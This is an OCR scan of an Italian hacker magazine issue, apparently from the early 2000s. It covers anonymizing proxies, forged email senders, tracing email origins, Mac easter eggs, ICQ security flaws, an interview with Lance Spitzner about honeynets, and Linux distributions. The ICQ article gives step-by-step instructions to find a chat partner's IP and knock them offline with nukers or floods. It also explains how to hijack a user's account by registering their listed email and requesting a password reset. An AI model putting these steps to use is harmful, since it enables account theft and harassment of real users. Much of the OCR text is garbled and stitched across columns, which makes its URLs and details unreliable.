Quando nauighiamo in Internet ueniamn catalogati, 
riconosciuti, ci scaricano sol PC i "biscottini" per schedarci 
ma c'è, fortunatamente, un modo per sfuggire a tutto ciò... 



t Òt^ fa 



] orse non tuffi io 
sanno, ma esiste 
' un Grande Fratel- 
estremamente 
ingombrante e curioso che ci os- 
serva. Anzi ci spia. E come mezzo 
privilegiato per carpire informa- 
zioni sul nostro conto personale 
utilizza proprio Internet e le no- 
stre connessioni alla rete. 
Basta collegarsi ad un sito, ma- 
gari un portale con molto traffico, 
come quelli delle grandi società 
che operano in Internet, e il no- 
stro computer comincia a stringe- 
re una serie di relazioni con il ser- 
ver a cui ci si è collegati. Relazio- 
ni che si riducono sostanzialmen- 
te ad uno scambio di informazio- 
ni, come il rilascio da parte del 
server stesso dei cosiddetti co- 
okies, ovvero i "biscottini". 
Si tratta di piccoli file di testo che 
vengono registrati sul disco rigido 
del computer, spesso senza che 
l'utente se ne accorga, attraverso 
i quali, il server che li ha rilascia- 
ti può riconoscere iutente ogni 
volta che questo si collega al sito. 
Praticamente si viene schedati e 
ad ogni navigatore viene dato, 
anche se solo virtualmente, un 
volto. 

Ma questo è solo uno degli esem- 
pi banalissimi. In realtà i grossi 
gruppi che operano in Internet 
hanno proprio bisogno di censire 
e riconoscere i propri utenti, per- 
ché questi rappresentano al mo- 
mento attuale la loro unica vera 
ricchezza. 

Proxy Server: Server che si 
interpone fra la rete interna ed 
Internet per consentire un controllo di 
sicurezza dei dati in entrata e in 
uscita e per ottimizzare la 
comunicazione. 




» Il garante 
della Priuacy 

Per evitare questo tipo di intrusioni si 
possono usare dei server proxy ovvero 
dei server che garantiscono l'anonimato 
frapponendosi tra voi e il PC remoto che 
a cui vi state collegando ed evitando la 
trasmissione di dati. M^ 

Uno dei più noti ha un nome che è 
jasi premonitore "Anonymouse" 
- Jtp://nonymc^exom7) e la sua 
home page è piuttosto spartana. 

Qui le opzioni sono davvero limitate. 
E 1 disponibile uno spazio dove digitare 
l'indirizzo del sito che si vuole visitare in 
tutta sicurezza e completo anonimato. 

Navigando dalla finestra di Anony- 
mouse si è al sicuro dai "Cookies" ma 
non solo, infatti il sito cripta l'indirizzo e 
i dati del computer del navigatore e ri- 
esce anche a sanare alcuni problemi di 
compatibilità che generalmente nasco- 
no visitando siti che utilizzano elementi 
in Flash o Shokwave. Due programmi 



» Hnonymizer 
e i suoi fratelli... 



Sempre in tema di anonimato Anonymi- 
zer (http://www.anonymizer.com) è un 
altro sito che consente di navigare in mo- 
do completamente anonimo, scherman- 
do l'IP Ma non è il solo. Iprive.com 
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dex.html) propone una barra di navi- 
gazione da integrare al browser (Explo- 
rer 5). Si scarica in formato zippato e si 
installa come un accessorio di Explorer 
consentendo di navigare in segreto scri- 
vendo l'indirizzo non nello spazio abitua- 
le del browser ma in quello della barra 
aggiuntiva. «*.. 

Surfola (http://www.surTola.com) è 
. un serve proxy molto frequentato che of- 
fre lo stesso servizio di Anonymizer e co. 

Altri siti che risultano rilevanti sono 
http://www.^p^ebbe r.de, 
h^T*: / / w w w . r 
anonymity.com e I 
ceports.com. S 



»://www.spa- 



ANONIMITY 4 PROXY 



su web. 

Quando l'amministratore ai un ser- 
ver scandaglia le visite al sito può rileva- 
re in tutta comodità gli indirizzi IP di chi 
si è collegato, ma chi ha avuto l'accor- 
tezza di navigare usando Anonymouse 
lascerà la posto del proprio IP una serie 
di + + + + + + + + + + + + + + + + + . 

Il sito consente di inviare anche e- 
mail in tutta sicurezza. 




All'indirizzo 



si può scaricare il 
software gratuito e compatibile con 
Windows millenium "Anonimy 4 proxy" 
Con questo programma è possibile 
individuare in rete tutti i server proxy 
disponibili che danno anonimato. 
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e qualcuno vuole scrivere 
usando un mittente "fa/so" 
- può farlo in tutta tranquillità. 
I software di posta elettroni- 
ca consentono di barare 
senza problemi 
Gli unici dati che vengono ri- 
chiesti come indispensabili sono 
la @ seguita dal nome del provider nel- 
l'indirizzo. Si può quindi scrivere 
mefalso@nomeprovider.it 
senza problemi per account e per nome 
dell'utente. 

Se, ad esempio, riceviamo una e-mail 
sospetta magari con un indirizzo di po- 
sta Sharon.Stone@iol.com pos- 
siamo nutrire il sospetto che non ce l'ab- 
bia inviata l'attrice americana (sic!), ma 
facciamo a capire da dove arriva? 
Se possedete un Mac e il vostro client di 
posta è Outlook Express l'operazione è 
davvero semplicissima: dovete seleziona- 
re la voce "origine html" dal menu "Visua- 
lizza". 

Compariranno una serie di dati proprio, 
tra cui l'indirizzo ip composto in genere 
da quattro gruppi di numeri divisi da al- 
trettanti punti (es. 62.110.12.221). Inol- 
tre, compariranno anche il nome del ser- 
ver di posta e altri dati utili. A/la // più 
importante in assoluto rimane proprio 
l'indirizzo ip, attraverso di esso si può in- 
fatti risalire ad informazioni precise sul 
server: si potrà sapere di quale azienda 
si tratta, oppure in quale città il server è 
fisicamente collocato. Per avere questi 



MACATTXCK 

La "mela" riballe di mille trucchetti pronti per l'uso. 
Tra questi la possibilità, dannerò alla portata di tutti, 
di rintracciare il mittente segreto di una e-mail, 
magari per risalire allo "spammatore mascherato" 



dati basta collegarsi all'indirizzo www. ri- 
pe, net/cgi-bin/whois. Il sito presenta subi- 
to in home page il motore di ricerca e una 
sezione in cui inserire l'indirizzo ip ricavato 
secondo il procedimento illustrato. Una 
volta inserito l'indirizzo, basta dare il via 
alla ricerca e il gioco è fatto. In pochi se- 
condi avremo tutti i dati salienti e potremo 
svelare con assoluta certezza se la mitten- 
te è /a be//a Sharon oppure no... A/la non 
finisce qui. Se per caso disponiamo di un 
nome e un cognome e vogliamo as- 
sociarlo ad un indi- ^ 
rizzo di posta, -* 
possiamo usare 
dei servizi che for- 
niscono tutte le i 
informazioni del JU| 



ì scaricando, vi chiamano al tele 
come fare a rispondere e riprende 
downoload dal punto dove è stato i 
rotto? Semplice: staccate il cavo telefc 
mentre siete ancora connessi ad Inter 
Quando per riprendere lo scaricarne 
sufficiente reinserire il cavetto della 
telefonica e connettersi al proprio p 
der come si fa di solito utilizzando P 
Remote Access o simili. A conness 
effettuata tornate su Netscape. A qi 
punto vedrete ancora la finestra 
download anche se il file non è at 



www. infospa- 

ce.com 

n wwwDronfo./f. m 



mente in scaricamento, ora cliccate 
bottone Cancel ed dopo cliccate su 
sulla pagina dalla quale avevate co 
ciato lo scaricamento per la prima ve 
N^cape ricominciare a scaricare g 
aveva interrotto in precedenza. 
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Le "uova di pasqua" 
per Mac certo non 
mancano, anzi, 
se ne segnalano 
anche per il nuovo 
sistema operativo 
Aqua. 

Invitiamo i lettori 
di Hacker Journal 
a segnalarci 
gli eventuali 
trucchetti o Easter 
Eggs in cui 
dovessero imbattersi 
smanettando sui 
diversi programmi. 
Pubblicheremo tutto: 
l'argomento è molto 
gradito... 



Quark Xpress 4.0 



ResEdit 2.1.3 



Mac OS X 



Promemoria 




Create uno spazio 
oggetto e con il pun- 
tatore attivo premete 
per 4 volte la combi- 
nazione di tasti 
Mela+Opzione+Shift 
+ Delete. Comparirà 
un alieno, premen- 
do una quinta volta 
ne otterete un altro. 



In "ResEdit", tenete 
premuti i tasti Mela 
+ Opzione e sele- 
zionate la voce 
"About ResEdit..." del 
menu Mela per 
conoscere il nome 
degli sviluppato" 
del software. 



Per minimizzare 
una finestra nel 
Dock, è sufficiente 
tenere premuto il 
tasto Maiuscole 
prima di effettuare 
l'operazione. 
Funziona anche 
quando si desidera 
massimizzare una 
finestra nel Dock. 




Aprite "Promemoria" 
dal menu Mela e, 
in una nuova nota, 
scrivete senza virgo- 
lette "Antler!" per 
conoscere la sorpre- 
sa nascosta. 
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ICQ SENZA "VELI" 




Usate spesso ICQ per 
chattare direttamente 
con i uostri amici on line? 
Dopo la lettura di questa 
articolo dobiterete 
seriamente dell'integrità 
del uostro sistema in una 
sessione di chat. 



Chat: Sistema che consente 
il dialogo di più utenti 
contemporaneamente tramite 
Internet. I chat possono essere 
pubblici o privati (ospitati in room) 



ave an 






» Carne funziona? 

Ogni utente ha un client ICQ, che ha 
memorizzato l'uin, la pass e il nick del- 
l'utente, assieme ad un gran numero di 
altre info. Al momento della connessio- 
ne, il client chiama il server ICQ, dove 
stanno i database dinamici che raccol- 
gono tutti i vari movimenti di rete. 
Il server, come già detto, riceve un avvi- 
so da parte del client e segnala che sia- 
mo on line. Se il nostro uin è nella list di 
qualche altro utente, questo verrà avvi- 
sato dal server della nostra presenza. 
Quando due utenti, finalmente :-) deci- 
dono di parlare tra loro, viene aperta 
una sessione diretta di chat: in pratica 
l'utente "a" chatta con l'utente "b" trami- 
te una connessione tcp/ip diretta. 
Esistono una serie di regole che un uten- 
te può applicare a se stesso: per esem- 
pio può scegliere di essere invisibile agli 
altri utenti che non lo hanno in lista, o di 



e un pro- 
grommo (di 
origine 

israeliana) 

i . J 

che consente 

a moltissimi 

utenti (siomo 
ormoi nell'ordine dei milioni) di chottore, 
scombiore file, inviore emoil e molte oltre 
cose tro loro; in modo piuttosto differen- 
te di come avviene in uno normole chot 
IRC (quelle a cui vi collegote col MIRC, 
tonto per co pi rei). 

Ogni utente ICQ si registro tromite un 
nick, uno password e, soprattutto, un 
UIN: questo UIN è l'unico 
dato davvero importante 
(assieme alla pas- 
sword) e identifica ogni 
utente in modo univoco 
(non può dunque accadere 
che 2 utenti abbiano stesso 
UIN), mentre il nickname 
può essere anche lo stesso 
di altri 2000 utenti. Ogni 
utente ha il suo ICQ, che di 




default si "storta" quando viene attivata 
la connessione in rete, e che manda al 
server centrale di ICQ una cosa del tipo: 
"Ehi, Puin 12345678 è on line!" 

Gli altri utenti potranno dunque con- 
tattarci: ogni utente ha una "lista" nella 
quale sono immagazzinati i vari "contat- 
ti" (identificati dall'UlN), e quando 
qualcuno è on line insieme a noi, vedre- 
mo il suo nick lampeggiare e passare 
nella lista ON UNE USER (tutto è custo- 
mizzabile), e sarà dunque semplicissimo 
contattarlo. Sembra una cosa macchino- 
sa, ma in realtà è geniale, e somiglia 
moltissimo al telefono: per trovare qual- 
cuno e mantenere contatti on line è as- 
solutamente più pratico che non andare 
in giro per centinaia di server ire e rispet- 
tivi canali a fare whois di \*nick\*... o no? 

Naturalmente esistono anche molti 
altri sistemi simili, vengono chiamati si- 
stemi di istant messaging (come quelli di 
AOL o di Microzozz). Curiosità: ICQ 
non è acronimo di nulla, questo nome fu 
scelto solo perché in inglese suona come 




essere non raggiungibile, o altro. Esisto- 
no anche altre operazioni che due uten- 
ti possono fare: stabilire una sessione di 
chat simile a quelle di IRC, in modo da 
partecipare in più di due, spedirsi file 
etc... Tutto questo, durante una sessione 
ordinaria, avviene sempre in modalità 
diretta. Detto così, ICQ è la perfezione 
della comunicazione via chat: semplice, 
veloce, affidabile. Ma è anche sicuro? 
Certamente no... 

» Doue sta la uera 
fregatura? 

ICQ è un sistema molto complesso, 
con una sua architettura e un suo pro- 
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Cr ICQ.com 
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tocollo, che consente tutte le operazio- 
ni. Nel corso degli anni molte versioni 
di icq hanno implementato sempre più 
opzioni, e ad oggi possiamo addirittu- 
ra chiamare tramite Voice Over IP un 
utente ICQ. 

Data la sua relativa complessità, 
però, il nostro caro software non è 
esente da problemi di sicurezza. Ini- 
ziamo dai semplici attacchi lama: il 
traffico di ICQ viaggia in porte com- 
prese tra 1000 e 2000, e viene indiriz- 
zato dal client in base al tipo di richie- 
sta (sia essa al server, o una DCC ver- 
so altri client). Dato il fatto che le ses- 
sioni di chat vengono abitualmente 
gestite (come già detto) in DCC, ci sa- 
ranno tante porte aperte quante ses- 
sioni attive di chat. ICQ non consente, 
tramite le sue opzioni, di conoscere l'IP 
di un utente che sta chattando di noi 
(e che a cosa servirebbe?). 

Ma una sessione diretta implica un 
traffico sul nostro modem quanto su 
quello dell'altro utente mediante una 
connessione TCP-IP sincrona: in prati- 
ca, per poter parlare con un'altra 
macchina, dobbiamo conoscerne l'IP 

E il nostro OS, infatti, lo conosce: 
basta fare un bel netstat -a dal prompt 
di Dos durante una sessione ICQ per 
ottenere la lista delle connessioni atti- 
ve, quelle attorno alla 1024 sono le 
nostre DCC di ICQ, e l'IP sarà con tut- 
ta probabilità quello dell'utente con 
cui stiamo chattando. 

Conosciuto questo dato, possiamo 
iniziare la solita sfilza di lamerate: esi- 
stono numerosi programmini che in- 
viano i soliti pacchetti forgiati ad arte 
per mandare in crash o chiudere con- 
nessioni (nukers e boiate simili). 

Se proprio non sappiamo come 
trovare l'IP della vittima (magari per- 
ché per un problema di DCC il traffi- 
co passa tramite il server), sono in gi- 



ro una marea di programmini per 
flood&co che agiscono semplicemente 
inviando una quantità enorme di mes- 
saggi alla vittima fino a causarne un 
ping timeout e quindi una disconnes- 
sione. 

E' possibile inviare anche messaggi 
spoofati, ovvero che paiono provenire 
da qualcuno che in realtà non è colui 
che ce li sta mandando. 



» I problemi non 
finiscono mai... 



Ma i problemi di ICQ non si fermano 
qui, e anzi si fanno più seri: tolti i 
DOS, esistono una quantità di falle di 
sicurezza vere e proprie nel client 
ICQ. 

Per esempio, sin dalle prime ver- 
sioni era possibile utilizzare il client 



Dove? ICQ si scarica 
liberamente all'indirizzo 
www.icq.com, sia per PC che 

per Mac. Altri software sono 

C6 Atlandide, scaricabile 
da: http:// atlantide.virgilio.it/ 
co/, mire, all'indirizzo: 
http://www.mirc.com/, e Msn 
(se proprio volete fare un 
altro fore a Bill): www. msn. 



ICQ come un vero e proprio WebSer- 
ver, aprendo cioè in sharing una car- 
tella del nostro PC in cui includere un 
vero e proprio sito web, la nostra ho- 
me page personale, per esempio, 
consultabile da altri utenti ICQ me- 
diante un semplice click. 

Bella idea, peccato che utilizzando 
un bug simile a quello dell'Unicode 
fosse possibile ottenere accesso illegit- 
timo ai dati contenuti sul disco fisso di 
chiunque avesse abilitato tale opzio- 
ne: in pratica, se la cartella condivisa 
è \cartella, era possibile "risalire" il 
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ramo delle directory fino a c:\ e quin- 
di downloadare qualsiasi file. 

Nelle nuove versioni del client que- 
sta vulnerabilità è stata eliminata. 

Altri problemi giungono dalla ge- 
stione del trasferimento file: come in 
Outlook, ovviamente, è possibile na- 
scondere l'estensione dei file in modo 
da distribuire in giro trojan e altre 
"belinate". 

Un altro trucco 



a cui pochi pensa- 
no quando fanno 
distrattamente una 
registrazione a 
qualsiasi servizio ti- 
po ICQ: molti 
utenti, credendosi 
furbi, mettono una 
email falsa all'atto 
della registrazione 
(tipo pippobubbo- 
la@libero.it invece 
della propria). L'e- 
mail di un utente 
ICQ è ben visibile 
ovunque. 
Se noi andiamo su www.iol.it, per 
esempio, e registriamo pippobubbo- 
la@libero.it (sperando che non sia già 
stata registrata), e poi andiamo nell'- 
home di ICQ nella sezione forgot your 
password (quella per chi ha scordato 
la password), mettiamo l'UlN della 
nostra vittima e richiediamo la pass 
per email, cosa succede? 

Che il server manda la pass all'e- 
mail che ha in memoria, che è quella 
registrata da NOI! 

Quindi attenzione gli errori più stu- 
pidi e banali che rischiano di rivelarsi 
i più subdoli. 

Esistono numerose altre falle di si- 
curezza in ICQ e, data la sua popola- 
rità, vi consiglio di studiarne il proto- 
collo e il funzionamento. 

Infine, se usate Linux, un consiglio 
spassionato: usate Licq, che a parte 
qualche piccolo problema di stabilità 
è ottimo e non soffre di quasi nessuna 
delle precedenti falle. E3 
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UN UFFICIALE CONTRO I "PIRATI" DELLA RETE 



Firewall: letteralmente "parete 
antincendio". Insieme di software/ 
hardware usato per filtrare i dati in 
scambio fra reti diverse, al fine di 
proteggere un server da attacchi via 
rete locale o via Internet. 



■ ^^^H i 



HJ, grazie alla preziosa collaborazione del sita Securitylnfas 
(nmmi.securityinfos.com), ha interuistato in esclusiua Lance Spitzner creatore 
del progetto Honegnet (http://project.honegnet.org/) 




Lancei che tipo d 
rienza hai nel capo del 
networking e della secu- 
rity? 

Sono stato nell'esercito americano 
per sette anni, quattro come ufficiale 
per la forza Rapid Deploymnet. Que- 
sta esperienza e 1 stata molto impor- 
tante per me, ho imparato che ci so- 
no parecchie analogie nel combatte- 
re i cattivi nei carri armati e combat- 
tere i cattivi nel cyberspazio. Dopo 
l'esercito ho preso la laurea in econo- 
mia e commercio; mentre ero al cor- 
so di laurea ho iniziato a lavorare nel 
campo della information tecnology e 
ho deciso di essere un geek. Mi sono 
cosi' specializzato nel campo dei com- 
puters e mi sono subito diretto verso 
la sicurezza informatica. Sin dal 1 997 
mi sono occupato prevalentemente di 
security. Il mio cammino è iniziato con 
i firewalls, ho installato soluzioni fire- 
wall per aziende in tutto il mondo. 
Questo ha accresciuto notevolmente 
le mie competenze in ambito di net- 
working e security. Negli ultimi 3 an- 
ni la mia ricerca e' stata focalizzata 
sulle tecnologie honeypot, e nello 
specifico, gli honeypots a scopo di ri- 
cerca utilizzati per comprendere cosa 
spinge un attacker a compromettere 
un sistema, chi e' l'attacker e perché 
compie certe azioni. 

Come mai hai deciso di 
specializzarti nel campo 
della security? 
E' molto simile alle mie esperienze in 
campo militare. La nostra missione è 
difenderci dagli attaccanti. Ci sono 
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mandiamo noi il progetto, è il pro- 
getto che comanda noi. 



TI 

Il progetti 
di tipo opi 



Come è nata 
progetto honeynet? 
E 1 un' idea che si è evoluta nel tempo 
fino a diventare un progetto. Nel 
Marzo del 1999 ho iniziato a cono- 
scere i concetti basilari di una Honey- 
net, ho iniziato a mettere una serie di 
sistemi dietro ai firewalls per essere 
attaccato. Mano a mano che le mac- 
chine venivano compromesse, ho 
chiesto aiuto a vari esperti della se- 
curity di livello mondiale (Marty 
Roesch, Chris Brento, Fyodor, etc). 
Questo gruppo si è evoluto creando 
una mailing list. Nel Giugno del 
2000, dopo che uno dei nostri sistemi 
era stato compromesso,abbiamo ini- 
ziato ufficialmente ad utilizzare il no- 
me di Honeynet Project. Il progetto 
non ha scadenze prefissate, piuttosto 
gli lasciamo fare il suo corso. Non co- 
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Il progetto Honeynet è 
di tipo opensourcGi non 
commerciale! quante ore 
al giorno gli dedichi e 
che sistemi operativi 
utilizzi? 

Ugg, troppe, tipo 20 ore a settimana 
del mio tempo (sere e weekends 
compresi!). 

In quali direzioni sta 
evolvendo il progetto? 
Nello specifico la Honeynet Research 
Alliance è un forum per le organizza- 
zioni a livello mondiale, per svilup- 
pare e fare ricerca e sviluppo sulle 
Honeynets. Ogni organizzazione è la 
benvenuta purché abbia i requisiti 
necessari. Al momento abbiamo 10 
membri, con Honeynets in tutto il 
mondo. E' possibile trovare maggiori 
informazioni direttamente sul sito: 
http://project.honeynet.org/alliance/ 
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Secondo ten quale sarà il 
futuro delle honeynets? 
LS: Dubito fortemente che avremo 
mai dei prodotti commerciali, troppo 
complessi e costosi. Invece, credo che 
le honeynets saranno utilizzate prin- 
cipalmente per scopi di ricerca e di 
intelligence limitandone cosi' l'utilizzo 
alle Università, agli organi governa- 
tivi, alle organizzazioni militari ed ai 
gruppi che fanno ricerca nel campo 
della security. Finché le Honeynets 
confineranno a dimostrare il loro va- 
lore, sempre più organizzazioni 
adatteranno ed utilizzeranno queste 
tecnologie. 

Bruce Schneier ci insegna 
che la security è un pro- 
cesso e non un prodotto^ 
pensi che potremo mai avere 
delle appliances hardware 
contenenti un honeypote e 
come potranno essere inte- 
grate nelle soluzioni di se- 
curity già esistenti 
Gli Honeypots sono unici in questo, 
hanno molte differenti variabili, di- 
pende da come li utilizzi. Per il 'secu- 
rity process', il loro valore primario è 
riconoscere gli attacchi. Esistono già' 
molti prodotti sul mercato che hanno 
questa funzione comeManTrap, Spec- 
ter, e Smoke Detector. 
E' possibile saperne ancora di più sul 
valore degli honeypots alla uri: 
http://www.tracking-hackers.com 

duali consigli dai a chi 
vuole iniziare a specia- 
lizzarsi nel campo della 
sicurezza informatica? 
Di non iniziare con gli honeypots o le 
Honeynets, ma di iniziare a capire le 
basi. Capire quindi l'hardening di 
una macchina, il networking e come 
funziona il protocollo IR Dopodiché é 
possibile guardare a tecnologie come 
i firewalls, gli IDS, gli honeypots, e la 
encyrption. Uno dei miei posti prefe- 
riti per iniziare è: http://www.lmux- 
security.com 

Ci puoi descrivere il 
processo di incident re- 



sponse dopo che una mac- 
china che fa parte della 
vostra honeynet è stata 
compromessa? fettPM^^^. 
Il processo di incident response di un 
honeypot è molto differente rispetto 
ad un normale 
response. 

Con un honeypot cne na come unico 
scopo la ricerca, si vuole conosceree 
apprendere le tecniche dei cattivi. 
Quindi quando un honeypot viene 
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compromesso, la fase ai response e 
quella di guardare e capire cosa sta 
succedendo. Dopo di che viene cattu- 
rato tutto il flusso di dati compresi i 
comandie e le chat IRC. 
Di solito facciamo in modo che chi 
compromette l'honeypot ne abbia il 
controllo fin quando uno dei due se- 
guenti criteri non è soddisfatto : non 
possiamo più imparare nulla di nuo- 
vo dalle tecniche dell'attacker ,1'attac- 
ker sta attaccando o distruggendo 
dei sistemi non honeypot. Una volta 
che l'attacco è completo, scriviamo un 
paper tecnico su cosa effettivamente 
è accaduto. 

Avremo quindi una seconda 
edizione del best seller 
Know your enemy? 
Sicuramente! Il nostro team inizierà 
a lavorarci presto. Abbiamo un sac- 
co di materiale da aggiungere. La 
tecnologia honeynet sta progreden- 
do velocemente e non vediamo l'ora 
di incominciare! r* 



BIOGRAFIA 

Lance Spitzner si 
diverte ad imparare 
facendo saltare 
i suoi sistemi Unix a 
casa. Prima di questo, era 
Ufficiale della Forza 
di Intervento Rapido 
(http : //www . enteract . coiti/ ~lspit z/ 
officer.html) , dove faceva 
saltare cose di diversa natura. 
E' raggiungibile 
a lance@spitzner.net 
Il suo libro più noto è "Conosci 
il tuo Nemico" dove Spitzner 
tratta la minaccia: Script 
Kiddie . 



FRASE CELEBRE 

Il mio comandante era solito 
dirmi che per difendersi 
da un nemico, è necessario 
conoscerlo. Questo concetto 
militare è facilmente 
applicabile al mondo 
della sicurezza di rete'' 



SCRIPT KIDDIE 

Lo script kiddie è qualcuno 
alla ricerca di una intrusione 
facile. Non sono alla ricerca 
di informazioni specifiche 
né cercano una particolare 
compagnia. Il loro obiettivo 
è quello di ottenere i privilegi 
di root nel modo più semplice 
possibile. Per ottenere ciò 
si concentrano su un piccolo 
numero di vulnerabilità, 
e cercano su tutta la Rete. 
Alcuni di loro sono utenti 
esperti che sviluppano da soli 
i propri strumenti software 
(tools) e si lasciano dietro 
sofisticate "porte di servizio" 
(backdoors) . Altri non hanno 
idea di quello che stanno 
facendo e sanno solo come 
digitare "via" al prompt 
dei comandi . 
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LINUX 



Good evening Mr. Gates, Vìi 



IL PIÙ SERIO ANTAGONISTA DI "BILL" 




Linux: Sistema operativo 
multiutente derivato da Unix, ma più 
compatto e semplice, che usa una 
interfaccia GUI a finestre. Prende il 
nome dall'ideatore, Linus Trovalds, 
un programmatore norvegese. 



Unix: Uniplexed Information and 
Computing System. Sistema 
operativo creato da Ken Thompson 
ed utilizzato dai mainframe e dai 
minicomputers. 
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Mandrake^tebian, RedHat, sono sola alcune delle molteplici uersiom di Lmu» 



rimili: HJ ui aiuta a capire quale puu fare al caso uustru... 



el variegato panorama Linux il 
primo problema da affrontare, 
per chi si avvicina per la prima 
~~ =— volta a questo splendido siste- 
ma operativo, è senza dubbio quello di 
scegliere la distribuzione più adatta ai 
propri gusti e all'utilizzo che si dovrà fare 
del proprio computer. Com'è noto, Linux 
è presente sul mercato in differenti pac- 
chettizzazioni, ognuna strutturata in mo- 
do diverso e comprensiva di diversi tools 
e applicazioni per l'amministrazione, la 
configurazione, l'editing, lo sviluppo etc... 
Ma a quale distribuzione sacrificare il 
proprio tempo e le proprie energie? Ad 
oggi possiamo disporre di una moltitudi- 
ne di differenti soluzioni, a seconda che le 
nostre esigenze siano meramente "casa- 
linghe" o marcatamente professionali. 
Diamo un'occhiata alle più famose distri- 
buzioni al fine di orientarci nella scelta di 
quella più adatta ai nostri bisogni. 

Tra le distro "stori- 
che" di Linux, Red- 
Hat è senza dubbio 
tra le più consolidate e supportate: Red- 
Hat è stata infatti una delle primissime 
società a intuire le potenzialità commer- 
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ciali di questo sistema operativo, e la sua 
distribuzione si è sempre contraddistinta 
per una semplicità d'uso e di gestione 
nettamente superiore rispetto alle più 
ostiche concorrenti. 

Propria di questa distro è infatti una mol- 
titudine di tools atti a velocizzare e sem- 
plificare notevolmente i vari lavori di con- 
figurazione&gestione del sistema opera- 
tivo, e ad oggi (nel momento in cui scri- 
viamo è disponibile la versione 7.3) il li- 
vello di automazione raggiunto è note- 
vole, in particolar modo per quanto ri- 
guarda tutti quei fastidi che in genere de- 
rivano dal dover convincere il nostro PC 
che quella che abbiamo appena colle- 
gato non è una stampante ma una mac- 
china fotografica digitale: ad oggi il rico- 
noscimento automatico delle periferiche 
e dell'hardware inizia a funzionare dav- 
vero alla grande. 

RedHat si distingue inoltre per aver 
introdotto nel mondo Linux i celeberrimi 
pacchetti rpm, mediante i quali l'installa- 
zione di nuovo software si è resa netta- 
mente più semplice che in passato; a 
conferma della bontà commerciale di 
questa scelta, molte distribuzioni basate 



su RedHat hanno assunto la medesima 
filosofia, adottandone in parte o in toto 
molte caratteristiche. RedHat si rivolge al 
mercato business come all'utenza desk- 
top: permette infatti di personalizzare in 
modo piuttosto approfondito la propria 
linuxbox, sia che vogliamo configurare 
un web server, sia che utilizziamo il no- 
stro fedele pinguino per divertirci in rete 
o per giocare. 

Per contro, possiamo muovere a que- 
sta celeberrima distro un paio di critiche 
riguardo la sicurezza e la stabilità dei 
pacchetti installati: è capitato che RedHat 
distribuisse versioni non proprio "graniti- 
che" della propria creatura, soggette il 
più delle volte a seri problemi di sicurez- 
za legati alla precocità dei pacchetti inse- 
riti, e, pertanto, per un uso aziendale 
(orientato al lato server) di questa distro, 
è consigliabile una massiccia fase di te- 
sting e di aggiornamento. 

Tra le "figlie" di Red- 
Hat, quella più fa- 
mosa e diffusa è 
senza dubbio Mandrake: rivolta ad una 
utenza prevalentemente casalinga, è in 
assoluto la distribuzione Linux più sem- 
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be your server today! » 




MP debian 



plice da installare e configurare, e anche 
quella più "user friendly". 

Ciò è evidente sin dalla fase di instal- 
lazione: un ottimo tool di partizione! men- 
to del disco solleva l'utente dalla necessi- 
tà di preparare preventivamente una 
partizione per il nuovo sistema operativo, 
nel caso sulla macchina sia già installato 
un altro S.O. (come Windows), e la sem- 
plicità di configurazione dell'hardware in 
molti aspetti surclassa qualsiasi altro tool. 
Sempre in fase di installazione sarà 
possibile scegliere quali applicazioni an- 
dare a installare, dai giochi ai vari tools 
dedicati allo sviluppo. Ultimamente, 
Mandrake inizia a rivolgersi marcata- 
mente anche al mercato server, imple- 
mentando nelle ultime relase una quan- 
tità di roba tra webserver, ftpserver etc... 
Mandrake è probabilmente la miglior 
soluzione per l'utenza domestica, ma già 
oggi molti aspetti di questa distro rendo- 
no quantomeno consigliabile darle 
un'occhiata anche dal lato server. 

Parlando di distribu- 
zioni orientate al bu- 
siness, una delle più 
famose e sicuramente delle più stabili e 
sicure è senza dubbio Debian: sviluppa- 
ta negli anni interamente utilizzando soft- 
ware open source, è ad oggi tra le distro 
più apprezzate dagli "addetti ai lavori". Le 
sue qualità nascono da un progetto to- 
talmente free: le scrupolose fasi di test 
che accompagnano ogni sua relase han- 
no reso Debian una tra le più solide dis- 
tribuzioni di Linux, anche se l'utente neo- 
fita potrebbe trovarsi spaesato dall'as- 
senza quasi totale di tools grafici atti a 
configurare l'hardware. 

■ Addentrandoci sem- 
pre più tra le distribu- 
zioni orientate ai pu- 
risti, arriva inesorabile Slackware: tra le 
prime distribuzioni ad apparire, è quella 
maggiormente "pulita". 

Non c'è interfaccia grafica, tutti gli or- 
pelli vari girano al largo da lei e sono 
bandite forme di pacchettizzazione del 
software tipo .rpm e .deb: Slackware se- 
gue stoicamente l'antica scuola del tgz. 
Se da un lato Slackware rimane apprez- 
zatissima dagli utenti più smaliziati e dai 
puristi, essendo quella che più delle altre 
incarna la filosofia open source, è pur 
vero che, ad un utente neofita e che de- 
sideri avvicinarsi per la prima volta a Li- 
nux, questa distribuzione chiude le porte 
in faccia. 

Ciò nonostante sono da encomiare le 
caratteristiche di stabilità e sicurezza rag- 
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giunte da Slackware, anche se ultima- 
mente le voci di chi la considera una dis- 
tro troppo "abbandonata a se stessa" ini- 
ziano a farsi insistenti. 

Oltre a queste distri- 
buzioni, sicuramente 
tra le più famose, ne 
esistono molte altre: possiamo breve- 
mente parlare di Suse, distribuita com- 
mercialmente da una omonima società 
tedesca, che si distingue per la sempli- 
cità di installazione e per le sue doti di 
stabilità e sicurezza. 

Una nota di merito a Madeinlinux, 
una distribuzione interamente sviluppata 
in Italia, che tenta di localizzare in modo 
molto marcato Linux nel nostro paese: il 
lavoro svolto dai ragazzi di MLX S.r.l. è 
ancora affetto da qualche pecca (in par- 
ticolar modo per quanto riguarda il lato 
server) ma la strada è quella giusta, ed è 
motivo di orgoglio avere finalmente una 
distribuzione "nostrana" in luogo delle 
solite (e a volte pessime) traduzioni da al- 
tri distribuzioni. 

Oltre a quelle esposte, esistono mol- 
tissime altre distro Linux, ognuna con le 
proprie caratteristiche, i propri pregi e i 
propri difetti. Il consiglio è: provatene 
quante più potete e cercate quella che 
meglio soddisfa le vostre esigenze sia di 
S.O che di lavoro. « 

1 



Sono disponibili diverse distribuzioni 

di Linux, alcune a pagamento come 

Red Hat, altre gratuite come Debian 

che è sviluppata da un gruppo di 

volontari che fanno ricerca, finanziati 

da Enti commerciali. 



ULTRACOMPATIBILE 



Contrariamente a quanto si è 
soliti sentire, Linux non è affatto un 
sistema operativo complesso da 
utilizzare, e non ha nulla da 
invidiare, in termini di produttività, a 
Windows 98, NT o MacOS. La 
compatibilità tra i vari mondi è 
garantita dall'Os stesso, basta infatti 
pensare che un pc con installata 
una recente versione di Linux è in 
grado di comunicare con reti 
Novell, Os2, Microsoft ed AppleTalk; 
quanto alle applicazioni, poi, vi 
sono centinaia di programmi per 
l'office automation, la grafica, il web 
publishing, e via discorrendo. 
